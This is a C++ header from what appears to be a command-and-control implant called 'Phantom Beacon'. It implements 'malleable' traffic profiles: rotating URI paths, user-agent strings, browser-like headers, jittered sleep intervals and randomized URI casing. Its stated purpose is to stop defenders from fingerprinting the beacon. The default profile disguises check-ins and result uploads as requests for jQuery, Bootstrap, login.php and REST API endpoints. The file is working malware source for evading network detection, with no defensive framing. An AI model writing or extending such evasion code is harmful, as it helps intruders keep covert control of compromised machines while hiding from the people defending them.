#pragma once
// ============================================================================
//  malleable.h — Phantom Beacon Malleable C2 Profiles
//  ──────────────────────────────────────────────────────────────────
//  A single profile struct controls every observable behaviour of the
//  beacon's network traffic so a defender cannot fingerprint Phantom by
//  static URI paths, user-agents, sleep cadence or header shapes.
//
//  The profile is defined in malleable_config.h (generated by the builder
//  from a JSON/Malleable-style profile file). If that file is absent, a
//  hardened default profile is used so the beacon still compiles standalone.
//
//  Profile knobs:
//    - GET / POST / RESULT URI paths (+ a pool of decoy paths)
//    - User-Agent pool (rotated per request)
//    - sleep_ms + jitter% (default cadence)
//    - optional custom headers (Host override, referrer, accept, etc.)
// ============================================================================

#include <string>
#include <vector>
#include <cstdint>
#include <cstring>

namespace malleable {

struct Profile {
    // ── URI paths ──────────────────────────────────────────────────────────
    std::vector<std::string> get_paths;       // check-in / task-polling
    std::vector<std::string> post_paths;      // result upload
    std::vector<std::string> decoy_paths;     // extra paths to blend in

    // ── Traffic shape ──────────────────────────────────────────────────────
    std::vector<std::string> user_agents;     // rotated per request
    std::vector<std::string> extra_headers;   // additional HTTP headers

    // ── Cadence ────────────────────────────────────────────────────────────
    uint32_t sleep_ms;                        // base sleep interval
    uint32_t jitter;                          // ± jitter percentage (0-100)

    // ── Fingerprint-relevant flags ─────────────────────────────────────────
    bool randomize_uri_casing;                // mix /Api vs /api vs /API
    bool prepend_slash;                       // ensure leading slash
};

// ── Default hardened profile (used when no malleable_config.h exists) ──────
// These paths mimic a generic static site + REST API so traffic blends with
// ordinary browser activity.
inline Profile default_profile() {
    Profile p;
    p.get_paths = {
        "/api/v1/ping",
        "/api/v1/status",
        "/js/jquery-3.6.0.min.js",
        "/static/css/bootstrap.min.css",
        "/favicon.ico",
    };
    p.post_paths = {
        "/api/v1/result",
        "/login.php",
        "/upload.aspx",
        "/api/v1/submit",
    };
    p.decoy_paths = {
        "/index.html",
        "/assets/logo.png",
        "/static/js/app.js",
        "/api/v1/config",
        "/health",
    };
    p.user_agents = {
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0",
    };
    p.extra_headers = {
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.9",
        "Cache-Control: no-cache",
    };
    p.sleep_ms = 5000;
    p.jitter = 30;
    p.randomize_uri_casing = true;
    p.prepend_slash = true;
    return p;
}

#if __has_include("malleable_config.h")
#include "malleable_config.h"
#endif

// ── Runtime accessors ──────────────────────────────────────────────────────
// The generated malleable_config.h is included HERE (after `Profile` is
// declared) — it references malleable::Profile via malleable_build_profile().
// These are deliberately non-const references so the generated
// malleable_config.h (if present) can override the defaults in one place.

#ifdef MALLEABLE_PROFILE_DEFINED
// Builder generated an explicit profile in malleable_config.h.
// It defines a function `malleable_build_profile()` returning a Profile.
inline Profile& get_profile() {
    static Profile p = malleable_build_profile();
    return p;
}
#else
inline Profile& get_profile() {
    static Profile p = default_profile();
    return p;
}
#endif

// ── Helpers ────────────────────────────────────────────────────────────────

/// Randomly pick a string from a pool (uses caller-seeded rand()).
inline const std::string& pick(const std::vector<std::string>& pool) {
    if (pool.empty()) {
        static const std::string empty;
        return empty;
    }
    return pool[static_cast<size_t>(rand()) % pool.size()];
}

/// Randomize URI casing so static signatures (e.g. "/api/v1/ping") don't
/// match. Only letters are toggled; digits and punctuation are preserved.
inline std::string randomize_casing(const std::string& uri) {
    std::string out = uri;
    for (auto& c : out) {
        if (c >= 'a' && c <= 'z') {
            if (rand() & 1) c = static_cast<char>(c - 32);
        } else if (c >= 'A' && c <= 'Z') {
            if (rand() & 1) c = static_cast<char>(c + 32);
        }
    }
    return out;
}

/// Return the next GET (check-in) path for this request.
inline std::string next_get_path() {
    Profile& p = get_profile();
    std::string path = pick(p.get_paths);
    if (p.prepend_slash && !path.empty() && path[0] != '/')
        path.insert(path.begin(), '/');
    if (p.randomize_uri_casing)
        path = randomize_casing(path);
    return path;
}

/// Return the next POST (result) path for this request.
inline std::string next_post_path() {
    Profile& p = get_profile();
    std::string path = pick(p.post_paths);
    if (p.prepend_slash && !path.empty() && path[0] != '/')
        path.insert(path.begin(), '/');
    if (p.randomize_uri_casing)
        path = randomize_casing(path);
    return path;
}

/// Return the next decoy path (for occasional noise requests, if enabled).
inline std::string next_decoy_path() {
    Profile& p = get_profile();
    std::string path = pick(p.decoy_paths);
    if (p.prepend_slash && !path.empty() && path[0] != '/')
        path.insert(path.begin(), '/');
    return path;
}

/// Return a rotated user-agent for this request.
inline const std::string& next_user_agent() {
    Profile& p = get_profile();
    return pick(p.user_agents);
}

}  // namespace malleable
